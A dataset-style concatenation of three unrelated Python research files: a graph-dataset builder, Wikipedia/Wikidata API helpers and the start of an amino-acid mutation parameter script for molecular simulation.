feature = torch.cat((torch.tensor(node_json[str(i)]), pointnet_torch[i].float()))
nodefeature.append(feature)
nodefeature = torch.stack(nodefeature)
elif self.nodefeature == 'pointnet':
#pointnet_torch = torch.load(os.path.join(self.root, "pretrained_pointnet_acc_features",self.pretrainedtype,fname+'.pth.tar'), map_location='cpu')
pointnet_torch = torch.load(os.path.join(self.root, "pretrained_avgpool_pointnet_features",self.pretrainedtype,fname+'.pth.tar'), map_location='cpu')
numnodes = len(pointnet_torch)
for i in range(numnodes):
nodefeature.append(pointnet_torch[i].float())
nodefeature = torch.stack(nodefeature)
elif self.nodefeature == "node+pointnet":
#pointnet_torch = torch.load(os.path.join(self.root, "pretrained_pointnet_acc_features",self.pretrainedtype,fname+'.pth.tar'), map_location='cpu')
pointnet_torch = torch.load(os.path.join(self.root, "pretrained_avgpool_pointnet_features",self.pretrainedtype,fname+'.pth.tar'), map_location='cpu')
node_json = json.load(open(os.path.join(self.root, "node", fname+'_node.json'),"r"))
numnodes = len(node_json)
for i in range(numnodes):
feature = torch.cat((torch.tensor(node_json[str(i)]), pointnet_torch[i].float()))
nodefeature.append(feature)
nodefeature = torch.stack(nodefeature)
elif self.nodefeature == "node+pointnetnormal":
#pointnet_torch = torch.load(os.path.join(self.root, "pretrained_pointnet_acc_features",self.pretrainedtype,fname+'.pth.tar'), map_location='cpu')
pointnet_torch = torch.load(os.path.join(self.root, "pretrained_avgpool_pointnetnormal_features",self.pretrainedtype,fname+'.pth.tar'), map_location='cpu')
node_json = json.load(open(os.path.join(self.root, "node", fname+'_node.json'),"r"))
numnodes = len(node_json)
for i in range(numnodes):
feature = torch.cat((torch.tensor(node_json[str(i)]), pointnet_torch[i].float()))
nodefeature.append(feature)
nodefeature = torch.stack(nodefeature)
elif self.nodefeature == 'node':
node_json = json.load(open(os.path.join(self.root, "node", fname+'_node.json'),"r"))
numnodes = len(node_json)
for i in range(numnodes):
nodefeature.append(node_json[str(i)])
nodefeature = np.array(nodefeature)
nodefeature = torch.from_numpy(np.array(nodefeature))
label = []
for i in range(numnodes):
label.append(label_json[str(i)])
y = torch.Tensor(np.array(label))
if self.typeofedge == 'node':
numnodes = torch.tensor([float(numnodes)])
fileindex = torch.tensor([float(findex[index])])
data_list.append(Data(x=nodefeature, fileindex=fileindex, numnodes=numnodes , y=y))
else:
nodepair = []
attribute = []
nodepair_dict = {}
if self.typeofedge != 'all':
# Undirected edge / Directed edges
nodesvisited = set()
if self.typeofedge == 'adjacency+similarity':
adjacencyedge_json = json.load(open(os.path.join(self.root, 'adjacency', fname+'_adjacency.json')))
similarityedge_json = json.load(open(os.path.join(self.root, 'similarity', fname+'_similarity.json')))
# 4 adjacency, 1 similarity
nodepair_dict = {x:{y:[0,0,0,0,0] for y in range(numnodes)} for x in range(numnodes)}
node_pair_set = set()
nodesvisited = set()
for node1,node1_neigh in adjacencyedge_json.items():
for node2, values in node1_neigh.items():
nodepair_dict[int(node1)][int(node2)][0:4] = values
for node1,node1_neigh in similarityedge_json.items():
for node2, values in node1_neigh.items():
nodepair_dict[int(node1)][int(node2)][4:] = [values]
for node1, node1neigh in nodepair_dict.items():
for node2, values in node1neigh.items():
if (node1,node2) in nodesvisited:
continue
if sum(values) != 0 or sum(nodepair_dict[node2][node1]) != 0:
nodepair.append([int(node1), int(node2)])
attribute.append(np.concatenate((nodepair_dict[node1][node2], nodepair_dict[node2][node1])))
nodesvisited.add((node1,node2))
nodesvisited.add((node2,node1))
elif self.typeofedge == 'adjacency+support':
adjacencyedge_json = json.load(open(os.path.join(self.root, 'adjacency', fname+'_adjacency.json')))
supportedge_json = json.load(open(os.path.join(self.root, 'support', fname+'_support.json')))
# 4 adjacency, 4 support
nodepair_dict = {x:{y:[0,0,0,0,0,0,0,0] for y in range(numnodes)} for x in range(numnodes)}
node_pair_set = set()
nodesvisited = set()
for node1,node1_neigh in adjacencyedge_json.items():
for node2, values in node1_neigh.items():
nodepair_dict[int(node1)][int(node2)][0:4] = values
for node1,node1_neigh in supportedge_json.items():
for node2, values in node1_neigh.items():
nodepair_dict[int(node1)][int(node2)][4:] = values
for node1, node1neigh in nodepair_dict.items():
for node2, values in node1neigh.items():
if (node1,node2) in nodesvisited:
continue
if sum(values) != 0 or sum(nodepair_dict[node2][node1]) != 0:
nodepair.append([int(node1), int(node2)])
attribute.append(np.concatenate((nodepair_dict[node1][node2], nodepair_dict[node2][node1])))
nodesvisited.add((node1,node2))
nodesvisited.add((node2,node1))
elif self.typeofedge == 'adjacency+containment':
containmentedge_json = json.load(open(os.path.join(self.root, 'containment', fname+'_containment.json')))
adjacencyedge_json = json.load(open(os.path.join(self.root, 'adjacency', fname+'_adjacency.json')))
# 4 adjacency, 2 containment,
nodepair_dict = {x:{y:[0,0,0,0,0,0] for y in range(numnodes)} for x in range(numnodes)}
node_pair_set = set()
nodesvisited = set()
for node1,node1_neigh in adjacencyedge_json.items():
for node2, values in node1_neigh.items():
nodepair_dict[int(node1)][int(node2)][0:4] = values
for node1,node1_neigh in containmentedge_json.items():
for node2, values in node1_neigh.items():
nodepair_dict[int(node1)][int(node2)][4:] = values
for node1, node1neigh in nodepair_dict.items():
for node2, values in node1neigh.items():
if (node1,node2) in nodesvisited:
continue
if sum(values) != 0 or sum(nodepair_dict[node2][node1]) != 0:
nodepair.append([int(node1), int(node2)])
attribute.append(np.concatenate((nodepair_dict[node1][node2], nodepair_dict[node2][node1])))
nodesvisited.add((node1,node2))
nodesvisited.add((node2,node1))
elif self.typeofedge == 'support+similarity':
supportedge_json = json.load(open(os.path.join(self.root, 'support', fname+'_support.json')))
similarityedge_json = json.load(open(os.path.join(self.root, 'similarity', fname+'_similarity.json')))
# 4 support, 1 similarity
nodepair_dict = {x:{y:[0,0,0,0,0] for y in range(numnodes)} for x in range(numnodes)}
node_pair_set = set()
nodesvisited = set()
for node1,node1_neigh in supportedge_json.items():
for node2, values in node1_neigh.items():
nodepair_dict[int(node1)][int(node2)][0:4] = values
for node1,node1_neigh in similarityedge_json.items():
for node2, values in node1_neigh.items():
nodepair_dict[int(node1)][int(node2)][4:] = [values]
for node1, node1neigh in nodepair_dict.items():
for node2, values in node1neigh.items():
if (node1,node2) in nodesvisited:
continue
if sum(values) != 0 or sum(nodepair_dict[node2][node1]) != 0:
nodepair.append([int(node1), int(node2)])
attribute.append(np.concatenate((nodepair_dict[node1][node2], nodepair_dict[node2][node1])))
nodesvisited.add((node1,node2))
nodesvisited.add((node2,node1))
elif self.typeofedge == 'containment+similarity':
containmentedge_json = json.load(open(os.path.join(self.root, 'containment', fname+'_containment.json')))
similarityedge_json = json.load(open(os.path.join(self.root, 'similarity', fname+'_similarity.json')))
# 2 containment, 1 similarity
nodepair_dict = {x:{y:[0,0,0] for y in range(numnodes)} for x in range(numnodes)}
node_pair_set = set()
nodesvisited = set()
for node1,node1_neigh in containmentedge_json.items():
for node2, values in node1_neigh.items():
nodepair_dict[int(node1)][int(node2)][0:2] = values
for node1,node1_neigh in similarityedge_json.items():
for node2, values in node1_neigh.items():
nodepair_dict[int(node1)][int(node2)][2:] = [values]
for node1, node1neigh in nodepair_dict.items():
for node2, values in node1neigh.items():
if (node1,node2) in nodesvisited:
continue
if sum(values) != 0 or sum(nodepair_dict[node2][node1]) != 0:
nodepair.append([int(node1), int(node2)])
attribute.append(np.concatenate((nodepair_dict[node1][node2], nodepair_dict[node2][node1])))
nodesvisited.add((node1,node2))
nodesvisited.add((node2,node1))
elif self.typeofedge == 'support+containment':
containmentedge_json = json.load(open(os.path.join(self.root, 'containment', fname+'_containment.json')))
supportedge_json = json.load(open(os.path.join(self.root, 'support', fname+'_support.json')))
# 4 support, 1 containment
nodepair_dict = {x:{y:[0,0,0,0,0] for y in range(numnodes)} for x in range(numnodes)}
node_pair_set = set()
nodesvisited = set()
for node1,node1_neigh in supportedge_json.items():
for node2, values in node1_neigh.items():
nodepair_dict[int(node1)][int(node2)][0:4] = values
for node1,node1_neigh in containmentedge_json.items():
for node2, values in node1_neigh.items():
nodepair_dict[int(node1)][int(node2)][4:] = values
for node1, node1neigh in nodepair_dict.items():
for node2, values in node1neigh.items():
if (node1,node2) in nodesvisited:
continue
if sum(values) != 0 or sum(nodepair_dict[node2][node1]) != 0:
nodepair.append([int(node1), int(node2)])
attribute.append(np.concatenate((nodepair_dict[node1][node2], nodepair_dict[node2][node1])))
nodesvisited.add((node1,node2))
nodesvisited.add((node2,node1))
elif self.typeofedge == 'similarity':
edge_json = json.load(open(os.path.join(self.root, self.typeofedge, fname+'_'+self.typeofedge+'.json'),'r'))
for i in range(numnodes):
nodepair.append([int(i), int(i)])
attribute.append(np.ones(2))
nodesvisited.add((str(i),str(i)))
for node1,node1_neigh in edge_json.items():
for node2, values in node1_neigh.items():
if (node1,node2) in nodesvisited:
continue
if values != 0:
nodepair.append([int(node1), int(node2)])
attribute.append(np.concatenate(([edge_json[node1][node2]],[edge_json[node2][node1]])))
nodesvisited.add((node1,node2))
nodesvisited.add((node2,node1))
elif self.typeofedge == 'containment':
edge_json = json.load(open(os.path.join(self.root, self.typeofedge, fname+'_'+self.typeofedge+'.json'),'r'))
for i in range(numnodes):
nodepair.append([int(i), int(i)])
attribute.append(np.ones(4))
nodesvisited.add((str(i),str(i)))
for node1,node1_neigh in edge_json.items():
for node2, values in node1_neigh.items():
if (node1,node2) in nodesvisited:
continue
if sum(values) != 0:
nodepair.append([int(node1), int(node2)])
attribute.append(np.concatenate((edge_json[node1][node2],edge_json[node2][node1])))
nodesvisited.add((node1,node2))
nodesvisited.add((node2,node1))
elif self.typeofedge == 'adjacency':
edge_json = json.load(open(os.path.join(self.root, self.typeofedge, fname+'_'+self.typeofedge+'.json'),'r'))
for i in range(numnodes):
nodepair.append([int(i), int(i)])
attribute.append(np.ones(8))
nodesvisited.add((str(i),str(i)))
for node1,node1_neigh in edge_json.items():
for node2, values in node1_neigh.items():
if (node1,node2) in nodesvisited:
continue
if (sum(values[3:]) != 0):
nodepair.append([int(node1), int(node2)])
if (node2 in edge_json and node1 in edge_json[node2]):
attribute.append(np.concatenate((edge_json[node1][node2][3:], edge_json[node2][node1][3:])))
else:
attribute.append(np.concatenate((edge_json[node1][node2][3:], edge_json[node1][node2][3:])))
elif self.typeofedge == 'support':
edge_json = json.load(open(os.path.join(self.root, self.typeofedge, fname+'_'+self.typeofedge+'.json'),'r'))
for i in range(numnodes):
nodepair.append([int(i), int(i)])
attribute.append(np.ones(8))
nodesvisited.add((str(i),str(i)))
for node1,node1_neigh in edge_json.items():
for node2, values in node1_neigh.items():
if (node1,node2) in nodesvisited:
continue
if (sum(values[3:]) != 0):
nodepair.append([int(node1), int(node2)])
if (node2 in edge_json and node1 in edge_json[node2]):
attribute.append(np.concatenate((edge_json[node1][node2][3:], edge_json[node2][node1][3:])))
else:
attribute.append(np.concatenate((edge_json[node1][node2][3:], edge_json[node1][node2][3:])))
nodesvisited.add((node1,node2))
nodesvisited.add((node2,node1))
elif self.typeofedge == 'all':
# Undirected edge / Directed edges
containmentedge_json = json.load(open(os.path.join(self.root, 'containment', fname+'_containment.json')))
adjacencyedge_json = json.load(open(os.path.join(self.root, 'adjacency', fname+'_adjacency.json')))
similarityedge_json = json.load(open(os.path.join(self.root, 'similarity', fname+'_similarity.json')))
supportedge_json = json.load(open(os.path.join(self.root, 'support', fname+'_support.json')))
# 4 adjacency, 1 similarity, 2 containment, 4 support
nodepair_dict = {x:{y:[0,0,0,0,0,0,0,0,0,0,0] for y in range(numnodes)} for x in range(numnodes)}
# 1 adjacency, 1 similarity, 2 containment, 4 support
#nodepair_dict = {x:{y:[0,0,0,0,0,0,0,0] for y in range(numnodes)} for x in range(numnodes)}
node_pair_set = set()
nodesvisited = set()
for i in range(numnodes):
nodepair.append([int(i), int(i)])
attribute.append(np.ones(22))
nodesvisited.add((str(i),str(i)))
for node1,node1_neigh in adjacencyedge_json.items():
for node2, values in node1_neigh.items():
nodepair_dict[int(node1)][int(node2)][0:4] = values[3:]
for node1,node1_neigh in similarityedge_json.items():
for node2, values in node1_neigh.items():
nodepair_dict[int(node1)][int(node2)][4:5] = [values]
for node1,node1_neigh in containmentedge_json.items():
for node2, values in node1_neigh.items():
nodepair_dict[int(node1)][int(node2)][5:7] = values
for node1,node1_neigh in supportedge_json.items():
for node2, values in node1_neigh.items():
nodepair_dict[int(node1)][int(node2)][7:] = values[3:]
for node1, node1neigh in nodepair_dict.items():
for node2, values in node1neigh.items():
if (node1,node2) in nodesvisited:
continue
if sum(values) != 0 or sum(nodepair_dict[node2][node1]) != 0:
nodepair.append([int(node1), int(node2)])
attribute.append(np.concatenate((nodepair_dict[node1][node2], nodepair_dict[node2][node1])))
nodesvisited.add((node1,node2))
nodesvisited.add((node2,node1))
nodepair = np.array(nodepair)
#edgeadjacencymatrix = util.getEdgeAdjacencyMatrix(numnodes,nodepair)
#edgeadjacencymatrix = np.reshape(edgeadjacencymatrix.flatten(),(-1,1))
#edgeadjacencymatrix = torch.from_numpy(edgeadjacencymatrix)
#adjacencymatrix = util.getAdjacencyMatrix(nodefeature.shape[0],nodepair)
#adjacencymatrix = np.reshape(np.array(adjacencymatrix.toarray()).flatten(), (-1,1))
#adjacencymatrix = torch.from_numpy(adjacencymatrix)
nodepair = torch.Tensor(nodepair)#, dtype=torch.long)
attribute = torch.Tensor(np.array(attribute))#, dtype=torch.float)
numnodes = torch.tensor([float(numnodes)])
numedges = torch.tensor([float(len(nodepair))])
fileindex = torch.tensor([float(findex[index])])
#data_list.append(Data(fileindex=fileindex, x=nodefeature , nodepair=nodepair, attribute=attribute, adjacencymatrix=adjacencymatrix, numnodes=numnodes, y=y))
data_list.append(Data( x=nodefeature , nodepair=nodepair, attribute=attribute, numedges=numedges , numnodes=numnodes, fileindex=fileindex, y=y))
data, slices = self.collate(data_list)
torch.save((data, slices), self.processed_paths[0])
# toremove = []
# for node1, node1neigh in nodepair_dict.items():
# for node2, values in node1neigh.items():
# if sum(values) <= 0:
# toremove.append([node1,node2])
#
# for items in toremove:
# del nodepair_dict[items[0]][items[1]]
#
# nodepair_values = {node1: node2 for node1,node2 in nodepair_dict.items() if node2}
| [
"pselvaraju@umass.edu"
] | pselvaraju@umass.edu |
e9a9824fb106bf2e8694b80bc0b009312ea0855d | 9392e0b7d08ba3c3d3021dc79f4efba964330fb6 | /all_functions.py | 597adb53bf2fa8cd344ffa91421f494217fb49dd | [] | no_license | mapzen-data/wikipedia-notebooks | 10bd611602c11d95b0400c408af6d2c7697aa134 | 308a9c63c446ee6e61e6784957717a3d6e1a9d57 | refs/heads/master | 2020-12-25T14:39:05.202357 | 2016-08-03T22:42:39 | 2016-08-03T22:42:39 | 61,059,553 | 9 | 1 | null | null | null | null | UTF-8 | Python | false | false | 15,914 | py | import csv
import pandas as pd
import requests
import json
import numpy as np
import io
import time
def read_data(path):
data=pd.read_csv(path, header=0, sep=',')
return data
def split_into_groups(data):
no_data = data[data['wk:page'].isnull()&data['wd:id'].isnull()]
only_wp = data[data['wk:page'].notnull()&data['wd:id'].isnull()]
only_wd = data[data['wk:page'].isnull()&data['wd:id'].notnull()]
both_wd_wp = data[data['wk:page'].notnull()&data['wd:id'].notnull()]
return no_data, only_wd, only_wp, both_wd_wp
def finditem(obj, key):
if key in obj: return obj[key]
for k, v in obj.items():
if isinstance(v,dict):
item = finditem(v, key)
if item is not None:
return item
def isNaN(num):
return num != num
def get_id(row):
wd_id=row['wd:id']
return wd_id
def get_page_name(row):
wp_page=row['wk:page']
return wp_page
def parse_name_from_url(url):
right_hand_side=url.rsplit('/',1)
name=right_hand_side[1]
return name
def combine_ids_for_API(data):
only_wd_new = []
all_ids=[]
data.index=range(len(data))
for index, row in data.iterrows():
if index != len(data)-1:
data_ids=str(get_id(row))+'|'
else:
data_ids=str(get_id(row))
all_ids.append(data_ids)
return all_ids
def combine_page_names(data):
all_names=[]
data.index=range(len(data))
for index, row in data.iterrows():
data_name=get_page_name(row)
all_names.append(data_name)
return all_names
def combine_page_names_for_API(names):
all_names_API=[]
all_names_for_API=[]
for index, item in enumerate(names):
if index != len(names)-1:
data_name=str(item)+'|'
else:
data_name=str(item)
all_names_API.append(data_name)
all_names_for_API="".join(all_names_API)
return all_names_for_API, names
def find_duplicates(data, field):
data_not_null=data[data[field].notnull()]
duplicate_index=data_not_null.duplicated(field)
are_duplicate=data_not_null[duplicate_index]
duplicate_wd_ids=np.asarray(are_duplicate[field])
data_duplicates=data.loc[data[field].isin(duplicate_wd_ids)]
return data_duplicates
def find_unique(data, field):
data_not_null=data[data[field].notnull()]
duplicate_index=data_not_null.duplicated(field)
unique=data_not_null[~duplicate_index]
return unique
def request_API_title(all_ids):
all_ids_for_API="".join(all_ids)
request = "https://www.wikidata.org/w/api.php?action=wbgetentities&ids=%s&props=sitelinks/urls&sitefilter=enwiki&languages=en&format=json" %all_ids_for_API
result_request=requests.get(request)
data_request = json.loads(result_request.content)
return data_request
def request_API_id_by_name(names_API, names):
try:
request = "https://en.wikipedia.org/w/api.php?action=query&prop=pageprops&titles=%s&format=json" %names_API
result_request=requests.get(request)
data_request = json.loads(result_request.content)
names_failed=[]
except ValueError:
data_request='null'
names_failed=names
return data_request, names_failed
def find_titles(data):
all_titles=[]
if data=='null':
titles=[]
elif 'error' in data.keys():
titles=[]
else:
data_entities=data['entities']
for item in data_entities:
split=data_entities[item]
title = finditem(split,'title')
final=(item,title)
all_titles.append(final)
titles=pd.DataFrame(all_titles)
titles.columns=['wd:id','wiki_page']
return titles
def find_page_id_urls(data):
all_urls=[]
if data=='null':
urls= "null"
elif 'error' in data.keys():
urls= "null"
else:
data_entities=data['query']['pages']
for item in data_entities:
split=data_entities[item]
title = finditem(split,'title')
ids = finditem(split,'wikibase_item')
final=(item,title,ids)
all_urls.append(final)
urls=pd.DataFrame(all_urls)
urls.columns=['wk_page_id','wk_name','wiki_id']
return urls
def execute_title_in_table_from_ids(data):
ids_data=combine_ids_for_API(data)
request_data=request_API_title(ids_data)
all_urls=find_titles(request_data)
names_failed=[]
if len(all_urls)!=0:
result=data.merge(all_urls,on='wd:id')
result['wk:page']=result['wiki_page']
result=result.drop('wiki_page',1)
else:
result=[]
names_failed=ids_data
return result, names_failed
def execute_ids_in_table_from_names(data):
all_names=combine_page_names(data)
name_data_for_API, names=combine_page_names_for_API(all_names)
request_data, names_that_failed=request_API_id_by_name(name_data_for_API, names)
all_ids=find_page_id_urls(request_data)
return all_ids, names_that_failed
def execute_titles_from_ids_one_by_one(data, names_that_failed):
API_result_second_try=[]
ids_cant_find=[]
all_dataframes_only_wp_second=[]
for ids_data in names_that_failed:
API_result=request_API_title(ids_data)
all_names=find_titles(API_result)
if len(all_names)==0:
wof_items_merge=[]
ids_cant_find.append(ids_data)
else:
API_result_second_try.append(all_names)
dataframe_list_second_try=[]
for i in range (len(API_result_second_try)):
if len(API_result_second_try[i])==0:
pass
else:
dataframe_list_second_try.append(API_result_second_try[i])
all_dataframes_only_wp_second = pd.concat(dataframe_list_second_try)
return all_dataframes_only_wp_second, ids_cant_find
def execute_ids_in_table_from_names_one_by_one(data, names_that_failed):
API_result_second_try=[]
names_cant_find=[]
ll_dataframes_only_wp_second=[]
for name in names_that_failed:
API_result,names_that_failed=request_API_id_by_name(name,name)
all_ids=find_page_id_urls(API_result)
API_result_second_try.append(all_ids)
if len(names_that_failed)>0:
names_cant_find.append(names_that_failed)
dataframe_list_second_try=[]
for i in range (len(API_result_second_try)):
if len(API_result_second_try[i])==0:
pass
else:
dataframe_list_second_try.append(API_result_second_try[i])
all_dataframes_only_wp_second = dataframe_list_second_try
return all_dataframes_only_wp_second, names_cant_find
def run_API_find_titles_in_batch(data_with_ids, batch_size):
result=[]
ids_failed=[]
for i in range(0,len(data_with_ids),batch_size):
only_wd_batch=data_with_ids[i:i+batch_size]
new_data, names_failed = execute_title_in_table_from_ids(only_wd_batch)
result.append(new_data)
if len(names_failed)!=0:
for item in names_failed:
new=item.replace("|", "")
ids_failed.append(new)
return result, ids_failed
def run_API_find_ids_in_batch(data_with_titles, batch_size):
result=[]
names_failed=[]
for i in range(0,len(data_with_titles),batch_size):
only_wp_batch=data_with_titles[i:i+batch_size]
new_data,names_that_failed = execute_ids_in_table_from_names(only_wp_batch)
result.append(new_data)
names_failed.append(names_that_failed)
time.sleep(10)
return result, names_that_failed
def combine_dataframes_from_batch(batch_result, names_failed):
dataframe_list=[]
dataframe_failed=[]
if len(batch_result)!=0:
for i in range (len(batch_result)):
if len(batch_result[i])==0 and len(names_failed)!=0:
dataframe_failed=dataframe_failed+names_failed
elif len(batch_result[i])==0 and len(names_failed)==0:
dataframe_failed=dataframe_failed
else:
dataframe_list.append(batch_result[i])
all_dataframes_final = pd.concat(dataframe_list)
else:
all_dataframes_final=batch_result
dataframe_failed=names_failed
return all_dataframes_final, dataframe_failed
def execute_linkshere_in_table_from_names(data):
all_names=combine_page_names(data)
linkshere_dictionary={}
names_failed=[]
for name in all_names:
all_titles_linked_final=[]
request_data=request_API_linkshere_by_name(name,'0')
if request_data!='null':
title_name,all_titles_linked=find_lks_name(request_data)
all_titles_linked_final.extend(all_titles_linked)
while request_data!='null' and request_data.keys()[0]!='batchcomplete' and len(all_titles_linked_final)<2000:
request_data=request_API_linkshere_by_name(name,request_data['continue']['lhcontinue'])
if request_data!='null':
title_name,all_titles_linked=find_lks_name(request_data)
all_titles_linked_final.extend(all_titles_linked)
linkshere_dictionary.update({name:all_titles_linked_final})
else:
names_failed.append(name)
return linkshere_dictionary, names_failed
def request_API_linkshere_by_name(name,i):
try:
request = "https://en.wikipedia.org/w/api.php?action=query&prop=linkshere|pageprops&titles=%s&lhcontinue=%s&format=json" %(name,i)
result_request=requests.get(request)
data_request = json.loads(result_request.content)
except ValueError:
data_request='null'
return data_request
def find_lks_name(request_data):
all_titles_linked=[]
if request_data=='null':
name=[]
elif 'error' in request_data.keys():
name=[]
else:
data_entities=request_data['query']['pages']
for item in data_entities:
all_titles_linked=[]
if item=='-1':
name=data_entities[item]['title']
else:
split=data_entities[item]
linkshere = finditem(split,'linkshere')
name=finditem(split,'title')
try:
for entry in linkshere:
title_linked=entry['title']
all_titles_linked.append(title_linked)
except Exception as e:
print 'error', e
return name, all_titles_linked
def request_API_real_name(name):
try:
request = "https://en.wikipedia.org/w/api.php?format=json&action=query&list=search&srsearch=%s&srprop=wordcount&srlimit=1" %name
result_request=requests.get(request)
data_request = json.loads(result_request.content)
except ValueError:
data_request='null'
return data_request
def find_actual_title_wordcount(data):
new=[]
for index, row in data.iterrows():
if 'name' in data.columns:
name = row['name']
else:
name = row['wk:page']
data_request = request_API_real_name(name)
if data_request=='null':
new.append(row)
elif 'error' in data_request.keys():
new.append(row)
else:
for item in data_request['query']['search']:
title = finditem(item,'title')
wordcount=finditem(item,'wordcount')
row['wk:page']=title
row['wordcount'] = wordcount
new.append(row)
new_df=pd.DataFrame(new)
return new_df
def get_wiki_page_wiki_id_SPARQL_data(data):
name_id=[]
for index, line in data.iterrows():
url=line['article']
url_name=str(url)
cid=line['cid']
if url_name!='nan':
wk_name=parse_name_from_url(url_name)
line['wk:page']=wk_name
wk_id = parse_name_from_url(cid)
line['wd:id'] = wk_id
name_id.append(line)
else:
name_id.append(line)
name_id_df=pd.DataFrame(name_id)
return name_id_df
def fix_coordinates_SPARQL_data(data):
dataframe_all=[]
for index, line in data.iterrows():
lat_lon=line['_coordinate_location']
lat_lon_str=str(lat_lon)
if lat_lon_str!='nan':
lat_lon_values=lat_lon_str[lat_lon_str.find("(")+1:lat_lon_str.find(")")]
lat_lon_values_split=lat_lon_values.rsplit(' ',1)
if len(lat_lon_values_split)==1:
dataframe_all.append(line)
else:
lat=lat_lon_values_split[1]
lon = lat_lon_values_split[0]
line['lat']=lat
line['lon']=lon
dataframe_all.append(line)
else:
dataframe_all.append(line)
dataframe_all_df = pd.DataFrame(dataframe_all)
return dataframe_all_df
def SPARQL_create_page_id_coordinates(data):
id_page=get_wiki_page_wiki_id_SPARQL_data(data)
dataframe_all_df=fix_coordinates_SPARQL_data(id_page)
return dataframe_all_df
def request_API_name_all_languages(name):
try:
request = "https://en.wikipedia.org/w/api.php?action=query&titles=%s&prop=langlinks&format=json" %(name)
result_request=requests.get(request)
data_request = json.loads(result_request.content)
except ValueError:
data_request='null'
return data_request
def request_API_name_all_languages_continue(name,i):
try:
request = "https://en.wikipedia.org/w/api.php?action=query&titles=%s&prop=langlinks&format=json&llcontinue=%s" %(name,i)
result_request=requests.get(request)
data_request = json.loads(result_request.content)
except ValueError:
data_request='null'
return data_request
def find_languages_name(request_data):
all_lang_linked={}
if request_data=='null':
name=" "
elif 'error' in request_data.keys():
name=" "
else:
data_entities=request_data['query']['pages']
for item in data_entities:
if item=='-1':
name=" "
else:
split=data_entities[item]
item= finditem(split,'title')
name = item
if 'langlinks' in split.keys():
langlinks = finditem(split,'langlinks')
for entry in langlinks:
lang=entry['lang']
name_in_lang=entry['*']
all_lang_linked.update({lang:name_in_lang})
return name, all_lang_linked
def execute_languages_in_dictionary_from_names(data):
all_names=combine_page_names(data)
all_titles_linked_final={}
language_dictionary={}
names_failed=[]
for name in all_names:
all_titles_linked_final={}
request_data=request_API_name_all_languages(name)
if request_data!='null':
if 'error' in request_data.keys():
names_failed.append(title_name)
else:
title_name,all_lang_linked=find_languages_name(request_data)
all_titles_linked_final.update(all_lang_linked)
while request_data!='null' and request_data.keys()[0]!='batchcomplete':
request_data=request_API_name_all_languages_continue(name,request_data['continue']['llcontinue'])
if request_data!='null':
if 'error' in request_data.keys():
names_failed.append(title_name)
else:
title_name,all_lang_linked=find_languages_name(request_data)
all_titles_linked_final.update(all_lang_linked)
else:
names_failed.append(title_name)
language_dictionary.update({name:all_titles_linked_final})
return language_dictionary, names_failed | [
"Olga Kavvada"
] | Olga Kavvada |
0627dc44488b0cb662ac6134c35bb17478c0fece | 47b4d76e9c87e6c45bab38e348ae12a60a60f94c | /Mutation_Modules/More_Backup/THR_HCY.py | 4a4ce8698134116f04127cebda9e92d3ca02eea6 | [] | no_license | PietroAronica/Parasol.py | 9bc17fd8e177e432bbc5ce4e7ee2d721341b2707 | 238abcdc2caee7bbfea6cfcdda1ca705766db204 | refs/heads/master | 2021-01-10T23:57:40.225140 | 2020-10-14T02:21:15 | 2020-10-14T02:21:15 | 70,791,648 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 18,357 | py | # THR to HCY Mutation
import Frcmod_creator
import PDBHandler
import Leapy
from ParmedTools.ParmedActions import *
from chemistry.amber.readparm import *
def parmed_command(vxi='VXI'):
bc = {}
with open('Param_files/AminoAcid/THR.param', 'r') as b:
data = b.readlines()[1:]
for line in data:
key, value = line.split()
bc[key] = float(value)
b.close()
fc = {}
with open('Param_files/AminoAcid/HCY.param', 'r') as b:
data = b.readlines()[1:]
for line in data:
key, value = line.split()
fc[key] = float(value)
b.close()
for i in range(11):
a = i*10
parm = AmberParm('Solv_{}_{}.prmtop'.format(a, 100-a))
changeLJPair(parm, ':{}@HB2 :{}@HG1 0 0'.format(vxi, vxi)).execute()
changeLJPair(parm, ':{}@HG21 :{}@HD 0 0'.format(vxi, vxi)).execute()
change(parm, 'charge', ':{}@N'.format(vxi), bc['N']+((fc['N']-bc['N'])/10)*i).execute()
change(parm, 'charge', ':{}@H'.format(vxi), bc['H']+((fc['H']-bc['H'])/10)*i).execute()
change(parm, 'charge', ':{}@CA'.format(vxi), bc['CA']+((fc['CA']-bc['CA'])/10)*i).execute()
change(parm, 'charge', ':{}@HA'.format(vxi), bc['HA']+((fc['HA']-bc['HA'])/10)*i).execute()
change(parm, 'charge', ':{}@CB'.format(vxi), bc['CB']+((fc['CB']-bc['CB'])/10)*i).execute()
change(parm, 'charge', ':{}@HB2'.format(vxi), fc['HB2']/10*i).execute()
change(parm, 'charge', ':{}@HB3'.format(vxi), bc['HB']+((fc['HB3']-bc['HB'])/10)*i).execute()
change(parm, 'charge', ':{}@CG'.format(vxi), bc['CG2']+((fc['CG']-bc['CG2'])/10)*i).execute()
change(parm, 'charge', ':{}@HG21'.format(vxi), bc['HG21']-(bc['HG21']/10)*i).execute()
change(parm, 'charge', ':{}@HG2'.format(vxi), bc['HG22']+((fc['HG2']-bc['HG22'])/10)*i).execute()
change(parm, 'charge', ':{}@HG3'.format(vxi), bc['HG23']+((fc['HG3']-bc['HG23'])/10)*i).execute()
change(parm, 'charge', ':{}@OG1'.format(vxi), bc['OG1']-(bc['OG1']/10)*i).execute()
change(parm, 'charge', ':{}@HG1'.format(vxi), bc['HG1']-(bc['HG1']/10)*i).execute()
change(parm, 'charge', ':{}@SD'.format(vxi), (fc['SD']/10)*i*i/10).execute()
change(parm, 'charge', ':{}@HD'.format(vxi), (fc['HD']/10)*i*i/10).execute()
change(parm, 'charge', ':{}@C'.format(vxi), bc['C']+((fc['C']-bc['C'])/10)*i).execute()
change(parm, 'charge', ':{}@O'.format(vxi), bc['O']+((fc['O']-bc['O'])/10)*i).execute()
setOverwrite(parm).execute()
parmout(parm, 'Solv_{}_{}.prmtop'.format(a, 100-a)).execute()
def makevxi(struct, out, aa, vxi='VXI'):
struct.residue_dict[aa].set_resname(vxi)
CG2 = struct.residue_dict[aa].atom_dict['CG2']
HG21 = struct.residue_dict[aa].atom_dict['HG21']
OG1 = struct.residue_dict[aa].atom_dict['OG1']
pdb = open(out, 'w')
try:
pdb.write(struct.other_dict['Cryst1'].formatted())
except KeyError:
pass
for res in struct.residue_list:
for atom in res.atom_list:
if atom.get_name() == 'HB' and res.get_resname() == vxi:
pdb.write(atom.superimposed1('HB2', OG1))
pdb.write(atom.change_name('HB3'))
elif atom.get_name() == 'CG2' and res.get_resname() == vxi:
pdb.write(atom.change_name('CG'))
